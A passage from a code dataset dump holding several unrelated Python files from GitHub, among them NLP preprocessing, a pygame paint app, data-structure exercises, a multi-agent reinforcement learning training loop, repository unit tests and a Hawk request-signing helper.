+ file_name)\nprint(\"docContent: \", docContent[0: 250], \"...\")\ndf = pd.DataFrame(data={'documentName': [], 'documentContent': []}, dtype=np.str_)\ndf.loc[1, 'documentName'] = 'filename1'\ndf.loc[1, 'documentContent'] = docContent\n\ndoc = nlp(docContent)\n\nwords_as_pos = []\nfor word in doc:\n if word.is_stop == False and len(word.text) > 2 and word.is_alpha: # letters at least 3 characters\n words_as_pos.append(word.pos_) # POS is more about the context of the features than frequencies of features\n\ndf['doc'] = df['documentContent'].apply(lambda x: nlp(x))\ndf['list_of_POSs'] = df['doc'].apply(lambda x: [word.pos_\n for word in x if (word.is_stop==False) & \\\n (len(word.text)>2) & \\\n (word.is_alpha)\n ])\n\n# count total frequencies of words\nPOS_freq_counter = collections.Counter(words_as_pos)\ns_POS_freq = pd.Series(POS_freq_counter, dtype=float)\ns_POS_freq = s_POS_freq.sort_values(ascending=False)\ndf_tmp = pd.DataFrame(s_POS_freq, columns=['Frequency'], dtype=float)\n# print(\"df_tmp: \\n\", df_tmp)\n\ndf_tmp.plot.bar(alpha=0.5, color='c', legend=False, title='POS frequency in all texts combined')\nplt.show()\n\nselected_POSs = ['NOUN', 'VERB', 'ADJ', 'ADV']\nprint('selecting POSs:', selected_POSs)\n\n# words_as_lemma = []\n# for word in doc:\n# if word.is_stop == False and len(word.text) > 2 and word.is_alpha and word.pos_ in selected_POSs:\n# words_as_lemma.append(word.lemma_)\n# final = \" \".join(words_as_lemma)\n# print(\"words_as_lemma: \", final[0: 150], \"...\")\n# df_data = pd.DataFrame.from_records(words_as_lemma, columns=['words_as_lemma'])\n\n\ndf['list_of_lemmas'] = df['doc'].apply(lambda x: [word.lemma_\n for word in x if (word.is_stop==False) & \\\n (len(word.text)>2) & \\\n (word.is_alpha) & \\\n (word.pos_ in selected_POSs)])\n\ntmp_list = df['list_of_lemmas'].apply(set).apply(list).tolist()\nlist_of_lemmas = [lemma for sublist in tmp_list for lemma in sublist]\n\nlemma_freq_counter = collections.Counter(list_of_lemmas)\ns_lemma_freq = pd.Series(lemma_freq_counter)\nprint('Total number of unique lemmas: ', len(s_lemma_freq))\n\nprint(\"\\nDistribution of lemmas' document counts: \", s_lemma_freq.describe(percentiles=[0.55, 0.65, 0.75, 0.85, 0.95, 0.97, 0.99]))\n\n# look through to 20 most/least frequent lemmas\ns_tmp = s_lemma_freq.sort_values(ascending=False)\ndf_tmp = pd.DataFrame({'Most freq words': list(s_tmp.index[:20]),\n 'M_freq': list(s_tmp.iloc[:20]),\n 'Least freq words': list(s_tmp.index[-20:]),\n 'L_freq': list(s_tmp.iloc[-20:])})\n\nprint (\"df_tmp: \\n\", df_tmp)\n\n# To reduce dimentionality of dictionary for topic modeling lemmas that have frequency count lower than 50th percentile and higer 99.9\n# percentile were deleted select upper and lower boundary for lemmas' count\nup_pct = s_lemma_freq.quantile(0.99)\nlow_pct = s_lemma_freq.quantile(0.50)\n\nprint('Lemma count upper bound:', up_pct)\nprint('Lemma count lower bound:', low_pct)\n\n# select lemmas\nselected_lemmas = set(s_lemma_freq[(s_lemma_freq >= low_pct)&(s_lemma_freq <= up_pct)].index)\nprint('List of lemmas for topic modeling dictionary is reduced from', len(s_lemma_freq), 'to', len(selected_lemmas))\nprint(\"\\nExample of selected lemmas:\", list(selected_lemmas)[:5])\n\n# select lemmas in each document if they belong to chosen list of lemmas\ndf['selected_list_of_lemmas'] = df['list_of_lemmas'].apply(lambda x: [l for l in x if l in selected_lemmas])","repo_name":"ermalaliraj/bigdata_and_ai","sub_path":"ai/eur-lex-integration/python_tatiana/preprocessing_lemma.py","file_name":"preprocessing_lemma.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70218652873","text":"def benchmark(func):\n \"wrapper for function benchmarking\"\n from time import time\n def wrapper(*args, **kwargs):\n start = time()\n result = func(*args, **kwargs)\n difference = (time() - start) * 1000 # milliseconds\n message = 'Benchmark: #' + func.__name__\n message += ': ' + (\"%0.2f\" % difference)\n return result\n return wrapper\n","repo_name":"allaud/lambda_store","sub_path":"src/python/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"974950867","text":"import pygame, sys\r\nimport numpy as np\r\npygame.init()\r\nsc = pygame.display.set_mode((1280, 720))\r\ndraw = False\r\nsize = 4\r\nrects = {(size, (0, 0, 0)): set()}\r\neraser = False\r\nfont = pygame.font.SysFont(None, 40)\r\nclock = pygame.time.Clock()\r\nr_s = 5\r\nc = (0, 0, 0)\r\nx = 17\r\nn_1 = np.array(range(-size, size))\r\n\r\ndef colors():\r\n global c, size, x\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n click = pygame.mouse.get_pressed()\r\n for i in range(0, 255):\r\n pygame.draw.rect(sc, (i, 0, 0), (22 + i, 515, 1, 40))\r\n pygame.draw.rect(sc, (0, i, 0), (22 + i, 555, 1, 40))\r\n pygame.draw.rect(sc, (0, 0, i), (22 + i, 595, 1, 40))\r\n pygame.draw.rect(sc, (i, i, i), (22 + i, 635, 1, 40))\r\n if m_y > 515 and m_y < 555:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (m_x - 22, 0, 0)\r\n elif m_y > 555 and m_y < 595:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (0, m_x - 22, 0)\r\n elif m_y > 595 and m_y < 635:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (0, 0, m_x - 22)\r\n elif m_y > 635 and m_y < 675:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (m_x - 22, m_x - 22, m_x - 22)\r\n pygame.draw.line(sc, (0, 0, 0), (22, 450), (272, 450), 3)\r\n pygame.draw.rect(sc, (75, 75, 75), (x, 430, 10, 40))\r\n if m_y > 430 and m_y < 470:\r\n if m_x > 17 and m_x < 272:\r\n if click[0] == 1:\r\n size = (m_x - 17)//25\r\n x = 17 + size * 25\r\n\r\ndef buttons(x, y, text, file, func1):\r\n global draw, eraser\r\n font = pygame.font.SysFont(None, 30)\r\n image = pygame.image.load(file).convert_alpha()\r\n sc.blit(image, (x,y))\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n if m_x > x and m_x < (x+50) and m_y > y and m_y < (y+50):\r\n click = pygame.mouse.get_pressed()\r\n if click[0] == 1:\r\n if func1 == eraser:\r\n eraser, draw = True, False\r\n elif func1 == draw:\r\n eraser, draw = False, True\r\n pygame.draw.rect(sc, (255, 255, 255), (x, y, 50, 50))\r\n symb = font.render(text, True, (255, 255, 255), (75, 75, 75))\r\n sc.blit(symb, (m_x, m_y - 15))\r\n\r\ndef bin(x, y):\r\n global rects\r\n font = pygame.font.SysFont(None, 30)\r\n image = pygame.image.load('bin.png').convert_alpha()\r\n sc.blit(image, (x, y))\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n click = pygame.mouse.get_pressed()\r\n if m_x > x and m_x < (x + 50) and m_y > y and m_y < (y + 50):\r\n if click[0] == 1:\r\n for key in rects.keys():\r\n rects[key] = set()\r\n pygame.draw.rect(sc, (255, 255, 255), (x, y, 50, 50))\r\n symb = font.render('Очистить (R)', True, (255, 255, 255), (75, 75, 75))\r\n sc.blit(symb, (m_x, m_y - 15))\r\n\r\ndef detect():\r\n global rects, types, types_list, sets, tup\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n koef = size * r_s\r\n if m_x > 300 and m_x < 1235 and m_y > 45 and m_y < 675:\r\n r_x = m_x // r_s * r_s\r\n r_y = m_y // r_s * r_s\r\n if draw and eraser is not True:\r\n if rects.get((size, c)) is not None:\r\n for i in n_1:\r\n for i1 in n_1:\r\n rects[(size, c)].add((r_x + i * r_s, r_y + i1 * r_s))\r\n else: rects[(size, c)] = {(-100, 0)}\r\n pygame.draw.rect(sc, (0, 0, 0), (r_x - koef, r_y - koef, koef * 2, koef * 2), 1)\r\n\r\ndef drawing():\r\n n_a = np.array(list(rects.keys()))\r\n for key in n_a:\r\n n = np.asarray(list(rects[tuple(key)]))\r\n for coords in n:\r\n pygame.draw.rect(sc, key[1], (coords[0], coords[1], r_s, r_s))\r\n\r\n\r\ndef eras():\r\n global rects\r\n click = pygame.mouse.get_pressed()\r\n if click[0] == 1:\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n for key in rects.keys():\r\n for i in n_1:\r\n dx = (m_x // r_s) + i\r\n for i1 in n_1:\r\n dy = (m_y//r_s)+i1\r\n if (dx*r_s, dy*r_s) in rects[key]:\r\n rects[key].remove((dx*r_s, dy*r_s))\r\n else: continue\r\n\r\n\r\ndef events():\r\n global draw, eraser, rects, scale\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n if eraser == False:\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\r\n draw = True\r\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\r\n draw = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_e:\r\n eraser = True\r\n elif event.key == pygame.K_b:\r\n eraser = False\r\n elif event.key == pygame.K_r:\r\n for key in rects.keys():\r\n rects[key] = set()\r\n\r\nwhile True:\r\n sc.fill((255, 255, 255))\r\n events()\r\n drawing()\r\n buttons(50, 45, 'Ластик (E)', 'eraser.png', eraser)\r\n buttons(50, 145, 'Кисть (B)', 'brush.jpg', draw)\r\n bin(50, 245)\r\n if eraser:\r\n eras()\r\n # sc.blit(symb, (640, 0))\r\n pygame.draw.rect(sc, (0, 0, 0), (300, 45, 935, 630), 2)\r\n colors()\r\n detect()\r\n clock.tick()\r\n pygame.display.set_caption(f'{clock.get_fps()}')\r\n pygame.display.flip()\r\n\r\n","repo_name":"2tieatie/paint_on_python","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72045666632","text":"class LinkedIntList:\n\n\n def __init__(self):\n self.size = 0\n self.first = None\n self.last = None\n\n\n def addLast(self,value):\n if self.first == None:\n self.last = IntNode(value, None)\n self.first = self.last\n else:\n node = IntNode(value, None)\n self.last.next = node\n self.last = node\n self.size += 1\n\n\n def addFirst(self, value):\n self.first = IntNode(value, self.first)\n self.size += 1\n\n\n def removeFirst(self):\n if self.isEmpty:\n raise ReferenceError(\"list is empty\")\n\n self.first = self.first.next\n self.size -= 1\n \n\n def removeLast(self):\n if self.isEmpty:\n raise ReferenceError(\"list is empty\")\n\n currentnode = self.first\n\n while currentnode.next != self.last:\n currentnode = currentnode.next\n\n currentnode.next = None\n self.size -= 1\n\n\n def clear(self):\n self.size = 0\n self.first = None\n self.last = None\n\n\n def isEmpty(self):\n if self.last == None:\n return True\n else:\n return False\n\n\n def get(self, index):\n if index >= self.size:\n raise ValueError(\"indexOutOfBounds\")\n\n currentnode = self.first\n for i in range(index):\n currentnode = currentnode.next\n return currentnode.value\n\n\n def set(self, index, value):\n if index >= self.size:\n raise ValueError(\"indexOutOfBounds\")\n\n currentnode = self.first\n for i in range(index):\n currentnode = currentnode.next\n currentnode.value = value\n\n\n def printList(self):\n string = \"[\"\n currentnode = self.first\n while True:\n string += \" {}\".format(currentnode.value)\n if currentnode.next == None:\n break\n else:\n currentnode = currentnode.next\n\n string += \" ]\"\n\n return string\n\nclass IntNode:\n def __init__(self, value, next):\n self.value = value\n self.next = next\n\n\nnewList = LinkedIntList()\n\nnewList.addLast(5)\nnewList.addLast(6)\nnewList.addFirst(2)\nnewList.addFirst(8)\nnewList.addLast(17)\n\nprint(newList.size)\nprint(newList.first.value)\nprint(newList.last.value)\nprint(newList.printList())\n","repo_name":"value03/linkedIntList","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42368563267","text":"import torch\nimport numpy as np\nfrom collections import deque\nfrom tensorboardX import SummaryWriter\nfrom unityagents import UnityEnvironment\nfrom agent import TennisAgent\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nRUN_NAME = \"Test2\"\n\n# Initializing the Unity Banana environment\nenv = UnityEnvironment(file_name=\"Tennis_Linux_NoVis/Tennis.x86_64\", worker_id=1)\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# Initializing the state_size and action_size for the environment\nt_env_info = env.reset(train_mode=True)[brain_name]\nt_state = t_env_info.vector_observations[0]\nnum_agents = len(t_env_info.vector_observations)\nstate_size = len(t_state)\naction_size = brain.vector_action_space_size\nprint('State shape: ', state_size)\nprint('Number of actions: ', action_size)\nprint('Number of agents: ', num_agents)\n\n# Creating the TennisAgent object\nagent = TennisAgent(state_size, action_size, num_agents)\n\n\ndef maddpq():\n \"\"\"This method collects values from the environment and passes those to the agent for training.\n This method also saves training data in \"log/tensorboard/\" and trained agents in \"checkpoints/\"\n \"\"\"\n\n scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100)\n writer = SummaryWriter(log_dir=\"log/tensorboard/\" + RUN_NAME) # initialize writer object for tensorboard\n\n i_episode = 0\n step = 0\n solved_episode = 0\n\n while True:\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations\n score = np.array([0.0 for i in range(num_agents)])\n\n while True:\n action = agent.act(state, add_noise=True, step=step)\n\n env_info = env.step(action)[brain_name]\n next_state = env_info.vector_observations\n reward = env_info.rewards\n done = env_info.local_done\n done_numpy = np.array(done).astype(np.float32)\n\n agent.step(state, action, reward, next_state, done_numpy)\n\n state = next_state\n score += np.array(reward)\n step += 1\n\n if np.any(done):\n break\n\n score = np.max(score)\n\n if len(scores_window) > 0:\n writer.add_scalar(\"score_mean_100\", np.mean(scores_window), i_episode)\n writer.add_scalar(\"score\", score, i_episode)\n writer.flush()\n\n scores_window.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.3f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n\n if i_episode > 0 and i_episode % 500 == 0:\n print()\n\n # Tf the mean score is 1.0, the training is finished\n if np.mean(scores_window) >= 1.0:\n if solved_episode == 0:\n solved_episode = i_episode\n\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.3f}'\n .format(i_episode, np.mean(scores_window)))\n\n print('\\nReached 0.5 mean on episode {:d}'.format(solved_episode))\n\n torch.save(agent.common_critic.state_dict(), 'checkpoints/' + RUN_NAME + 'critic.pth')\n for i in range(num_agents):\n torch.save(agent.actor[i].state_dict(), 'checkpoints/' + RUN_NAME + 'actor' + str(i + 1) + '.pth')\n\n break\n\n if np.mean(scores_window) >= 0.5 and solved_episode == 0:\n solved_episode = i_episode\n\n i_episode += 1\n\n writer.close()\n env.close()\n\n\nmaddpq()\n","repo_name":"fahimfss/ProjectTennis","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35060497698","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def sortedListToBST(self, head):\n if not head:\n return None\n arr = []\n node = head\n while node:\n arr.append(node.val)\n node = node.next\n\n def build_tree(arr, s, e):\n if s > e:\n return None\n # find middle\n m = (s + e) // 2\n new_node = TreeNode(arr[m])\n if s == e:\n return new_node\n new_node.left = build_tree(arr,s, m - 1)\n new_node.right = build_tree(arr,m + 1, e)\n return new_node\n return build_tree(arr, 0, len(arr) - 1)\n\ndef array_to_list(arr):\n head = node = ListNode(arr[0])\n for i in range(1, len(arr)):\n node.next = ListNode(arr[i])\n node = node.next\n return head\n\n\nsol = Solution()\n\nprint(sol.sortedListToBST(array_to_list([-10,-3,0,5,9])))\n\n","repo_name":"joestalker1/leetcode","sub_path":"src/main/scala/ConvertSortedListToBinarySearchTree.py","file_name":"ConvertSortedListToBinarySearchTree.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19188410751","text":"'''\nhttps://www.estadistica.net/Algoritmos2/pau-programacion.pdf\n\n\n'''\nfrom ortools.sat.python import cp_model\n\n#Inicializamos el modelo y el solucionador\nmodelo = cp_model.CpModel()\nsolucionador = cp_model.CpSolver()\n#Variables\n'''EN ESTE PROBLEMA VAMOS A TRABAJAR EN TONELADAS'''\npiensoA = modelo.NewIntVar(0, 6, \"piensoA\")\npiensoB = modelo.NewIntVar(0, 4, \"piensoB\")\n\n#Restricciones\nmodelo.Add(piensoB <= 2*piensoA)\nmodelo.Add(2*piensoA + piensoB >= 4)\n\n#Epresión a optimizar\nmodelo.Minimize(1000*piensoA + 2000*piensoB)\n\n#Accionamos el solucionador\nestado = solucionador.Solve(modelo)\n\n#Solución\nif estado == cp_model.OPTIMAL:\n print(\"**********************Solución**********************\")\nprint()\nprint(\"El valor óptimo es:\")\nprint(f'pienso A = {solucionador.Value(piensoA)}')\nprint(f'pienso B = {solucionador.Value(piensoB)}')","repo_name":"AnaLopezP/Prog_con_restricciones","sub_path":"ejercicio.py","file_name":"ejercicio.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25543780548","text":"import unittest\nfrom db.database import ShelveRepository\nfrom db.sequence import IncrementalSequence\nimport os\nfrom db.exceptions import PersistentObjectDoesNotExists\n\n\nclass Player:\n\n def __init__(self, name, surname, pk=None):\n self.name = name\n self.surname = surname\n if pk is not None:\n self.pk = pk\n\n\nclass ShelvePersistenceTest(unittest.TestCase):\n\n repository = None\n sequence = None\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.repository = ShelveRepository(\"players_test\", IncrementalSequence)\n cls.sequence = cls.repository.sequence_strategy\n\n @classmethod\n def tearDownClass(cls) -> None:\n del cls.repository\n cls.remove_test_db_files()\n\n @staticmethod\n def remove_test_db_files():\n my_dir = os.path.join(os.path.dirname(__file__), \"../../data/\")\n for file_name in os.listdir(my_dir):\n if file_name.startswith(\"players_test\"):\n os.remove(os.path.join(my_dir, file_name))\n\n def test_saves_object(self):\n player = Player(\"John\", \"Doe\")\n player = self.repository.save(player)\n self.assertTrue(hasattr(player, 'pk'))\n self.assertEqual(player.pk, self.sequence.get_current())\n\n def test_updates_existing_object(self):\n player = Player(\"John\", \"Doe\")\n player = self.repository.save(player)\n self.assertEqual(player.name, \"John\")\n player.name = \"John1\"\n self.repository.save(player)\n updated_player = self.repository.sync(player)\n self.assertEqual(updated_player.name, \"John1\")\n self.assertEqual(updated_player.pk, player.pk)\n\n def test_save_all(self):\n players = [Player(\"John1\", \"Doe1\"), Player(\"John2\", \"Doe2\"), Player(\"John3\", \"Doe3\"), Player(\"John4\", \"Doe4\")]\n self.repository.save_all(players)\n for player in players:\n self.assertTrue(hasattr(player, 'pk'))\n self.assertNotEqual(player.pk, 0)\n\n def test_get_by_id(self):\n player = Player(\"IdTest\", \"Test\")\n self.repository.save(player)\n retrieved_player = self.repository.get_by_id(player.pk)\n self.assertEqual(player.pk, retrieved_player.pk)\n self.assertEqual(player.name, retrieved_player.name)\n self.assertEqual(player.surname, retrieved_player.surname)\n\n def test_get_by_id_throws_exception_given_nonexistent_id(self):\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.get_by_id, 100500)\n\n def test_get_all(self):\n self.remove_test_db_files()\n self.repository.refresh_persistence()\n players = [Player(\"John1\", \"Doe1\"), Player(\"John2\", \"Doe2\"), Player(\"John3\", \"Doe3\"), Player(\"John4\", \"Doe4\"),\n Player(\"John5\", \"Doe5\")]\n self.repository.save_all(players)\n retrieved_players = self.repository.get_all()\n self.assertEqual(len(players), len(retrieved_players))\n\n def test_delete_by_id(self):\n player = Player(\"John\", \"Doe\")\n self.repository.save(player)\n self.repository.delete_by_id(player.pk)\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.get_by_id, player.pk)\n\n def test_delete_by_id_throws_exception_given_nonexistent_id(self):\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.delete_by_id, 100500)\n\n def test_sync(self):\n player = Player(\"Sync\", \"Sync\")\n self.repository.save(player)\n not_synced_player = Player(\"John\", \"Doe\", player.pk)\n synced_player = self.repository.sync(not_synced_player)\n self.assertEqual(player.pk, synced_player.pk)\n self.assertEqual(player.name, synced_player.name)\n self.assertEqual(player.surname, synced_player.surname)\n\n def test_sync_throws_exception_given_obj_with_nonexistent_id(self):\n player = Player(\"Sync\", \"Sync\", 100500)\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.sync, player)\n\n def test_sync_returns_none_given_non_persistent_obj(self):\n player = Player(\"Sync\", \"Sync\")\n synced_player = self.repository.sync(player)\n self.assertIsNone(synced_player)\n","repo_name":"CAPSLOCKFURY/cybernetics_hw","sub_path":"tests/db_tests/test_shelve_repository.py","file_name":"test_shelve_repository.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23795893866","text":"# Following is complete algorithm for finding longest distances.\n# 1) Initialize dist[] = {NINF, NINF, ….} and dist[s] = 0 where s is the source vertex. Here NINF means negative infinite.\n# 2) Create a topological order of all vertices.\n# 3) Do following for every vertex u in topological order.\n# ………..Do following for every adjacent vertex v of u\n# ………………if (dist[v] < dist[u] + weight(u, v))\n# ………………………dist[v] = dist[u] + weight(u, v)\n\n# A recursive function used by longestPath. See below\n# link for details\n# https:#www.geeksforgeeks.org/topological-sorting/\ndef topologicalSortUtil(v):\n global Stack, visited, adj\n visited[v] = True\n\n # Recur for all the vertices adjacent to this vertex\n # list::iterator i\n for i in adj[v]:\n if (not visited[i[0]]):\n topologicalSortUtil(i[0])\n\n # Push current vertex to stack which stores topological\n # sort\n Stack.append(v)\n\n# The function to find longest distances from a given vertex.\n# It uses recursive topologicalSortUtil() to get topological\n# sorting.\n\n\ndef longestPath(s):\n global Stack, visited, adj, V\n dist = [-10**9 for i in range(V)]\n\n # Call the recursive helper function to store Topological\n # Sort starting from all vertices one by one\n for i in range(V):\n if (visited[i] == False):\n topologicalSortUtil(i)\n # print(Stack)\n\n # Initialize distances to all vertices as infinite and\n # distance to source as 0\n dist[s] = 0\n # Stack.append(1)\n\n # Process vertices in topological order\n while (len(Stack) > 0):\n\n # Get the next vertex from topological order\n u = Stack[-1]\n del Stack[-1]\n # print(u)\n\n # Update distances of all adjacent vertices\n # list::iterator i\n if (dist[u] != 10**9):\n for i in adj[u]:\n # print(u, i)\n if (dist[i[0]] < dist[u] + i[1]):\n dist[i[0]] = dist[u] + i[1]\n\n # Print calculated longest distances\n # print(dist)\n for i in range(V):\n print(\"INF \", end=\"\") if (dist[i] == -\n 10**9) else print(dist[i], end=\" \")\n\n\n# Driver code\nif __name__ == '__main__':\n V, Stack, visited = 6, [], [False for i in range(7)]\n adj = [[] for i in range(7)]\n\n # Create a graph given in the above diagram.\n # Here vertex numbers are 0, 1, 2, 3, 4, 5 with\n # following mappings:\n # 0=r, 1=s, 2=t, 3=x, 4=y, 5=z\n adj[0].append([1, 5])\n adj[0].append([2, 3])\n adj[1].append([3, 6])\n adj[1].append([2, 2])\n adj[2].append([4, 4])\n adj[2].append([5, 2])\n adj[2].append([3, 7])\n adj[3].append([5, 1])\n adj[3].append([4, -1])\n adj[4].append([5, -2])\n\n s = 1\n print(\"Following are longest distances from source vertex \", s)\n longestPath(s)\n\n # This code is contributed by mohit kumar 29.\n","repo_name":"zyune/CS5800_algorithem","sub_path":"assignment5_other_graph_agorithem/longest_path_in_dag.py","file_name":"longest_path_in_dag.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"12495158221","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nDISTNAME = \"cornel-movie-dialogs-corpus-storm\"\nDESCRIPTION = \"A set of python modules for cornel movie-dialogs corpus with storm\"\nwith open(\"README.rst\") as f:\n LONG_DESCRIPTION = f.read()\nAUTHOR = \"Sosuke Kato\"\nAUTHOR_EMAIL = \"snoopies.drum@gmail.com\"\nURL = \"https://github.com/sosuke-k/cornel-movie-dialogs-corpus-storm\"\nLICENSE = \"MIT\"\nPACKAGES = [\"mdcorpus\"]\nPACKAGE_DIR = {\"mdcorpus\": \"mdcorpus\"}\nSCRIPTS = [\"scripts/generate-mdcorpus-database.py\"]\n\nimport mdcorpus\nVERSION = mdcorpus.__version__\n\n\ndef setup_package():\n metadata = dict(name=DISTNAME,\n description=DESCRIPTION,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=LICENSE,\n url=URL,\n version=VERSION,\n long_description=LONG_DESCRIPTION,\n packages=PACKAGES,\n package_dir=PACKAGE_DIR,\n scripts=SCRIPTS,\n )\n\n setup(**metadata)\n\n\nif __name__ == \"__main__\":\n setup_package()\n","repo_name":"sosuke-k/cornel-movie-dialogs-corpus-storm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17710460196","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nURL = \"http://datamall2.mytransport.sg/ltaodataservice/BusArrivalv2\"\n\nACCOUNT_KEY = os.getenv(\"ACCOUNT_KEY\")\nHEADERS = {\n \"AccountKey\": ACCOUNT_KEY \n}\n\n\nDIRECTUS_URL = \"http://directus:8055\"\nTOKEN = os.getenv(\"TOKEN\")\nDIRECTUS_HEADER = {\n \"Authorization\": f\"Bearer {TOKEN}\",\n 'Content-Type': 'application/json'\n}\n\nFIELD_NAMES = ['ServiceNo', 'NextBus_EstimatedArrival', 'NextBus_Latitude',\n 'NextBus_Longitude', 'NextBus_Load', 'NextBus_Type',\n 'NextBus2_EstimatedArrival', 'NextBus2_Latitude', 'NextBus2_Longitude',\n 'NextBus2_Load', 'NextBus2_Type', 'NextBus3_EstimatedArrival',\n 'NextBus3_Latitude', 'NextBus3_Longitude', 'NextBus3_Load',\n 'NextBus3_Type', 'Timestamp', 'NextBus_EstimatedArrivalDuration',\n 'NextBus2_EstimatedArrivalDuration',\n 'NextBus3_EstimatedArrivalDuration', 'BusStopCode']","repo_name":"weifeng1994/bus_data_collection","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23533947224","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport binascii\nimport codecs\nimport hashlib\nimport hmac\nimport math\nfrom six.moves import xrange\nfrom six.moves.urllib.parse import urlparse\nfrom six import text_type\n\nimport mohawk\nfrom requests.auth import AuthBase\n\n\nclass HawkAuth(AuthBase):\n \"\"\"Handles authentication using Hawk.\n\n :param hawk_session:\n The hawk session, from the server, encoded as hexadecimal.\n You don't need to set this parameter if you already know the hawk\n credentials (Optional).\n\n :param credentials:\n Python dict containing credentials information, with keys for \"id\",\n \"key\" and \"algorithm\" (Optional).\n\n :param server_url:\n The url of the server, this is useful for hawk when signing the requests.\n In case this is omited, fallbacks to the value of the \"Host\" header of\n the request (Optional).\n\n\n Note that the `hawk_session` and `credentials` parameters are mutually\n exclusive. You should set one or the other.\n\n \"\"\"\n def __init__(self, hawk_session=None, credentials=None, server_url=None):\n if ((credentials, hawk_session) == (None, None)\n or (credentials is not None and hawk_session is not None)):\n raise AttributeError(\"You should pass either 'hawk_session' \"\n \"or 'credentials'.\")\n\n elif hawk_session is not None:\n try:\n hawk_session = codecs.decode(hawk_session, 'hex_codec')\n except binascii.Error as e:\n raise TypeError(e)\n keyInfo = 'identity.mozilla.com/picl/v1/sessionToken'\n keyMaterial = HKDF(hawk_session, \"\", keyInfo, 32*2)\n credentials = {\n 'id': codecs.encode(keyMaterial[:32], \"hex_codec\"),\n 'key': codecs.encode(keyMaterial[32:64], \"hex_codec\"),\n 'algorithm': 'sha256'\n }\n self.credentials = credentials\n\n if server_url is not None:\n self.host = urlparse(server_url).netloc\n else:\n self.host = None\n\n def __call__(self, r):\n if self.host is not None:\n r.headers['Host'] = self.host\n\n sender = mohawk.Sender(\n self.credentials,\n r.url,\n r.method,\n content=r.body or '',\n content_type=r.headers.get('Content-Type', '')\n )\n\n r.headers['Authorization'] = sender.request_header\n return r\n\n\ndef HKDF_extract(salt, IKM, hashmod=hashlib.sha256):\n \"\"\"HKDF-Extract; see RFC-5869 for the details.\"\"\"\n if salt is None:\n salt = b\"\\x00\" * hashmod().digest_size\n if isinstance(salt, text_type):\n salt = salt.encode(\"utf-8\")\n return hmac.new(salt, IKM, hashmod).digest()\n\n\ndef HKDF_expand(PRK, info, L, hashmod=hashlib.sha256):\n \"\"\"HKDF-Expand; see RFC-5869 for the details.\"\"\"\n if isinstance(info, text_type):\n info = info.encode(\"utf-8\")\n digest_size = hashmod().digest_size\n N = 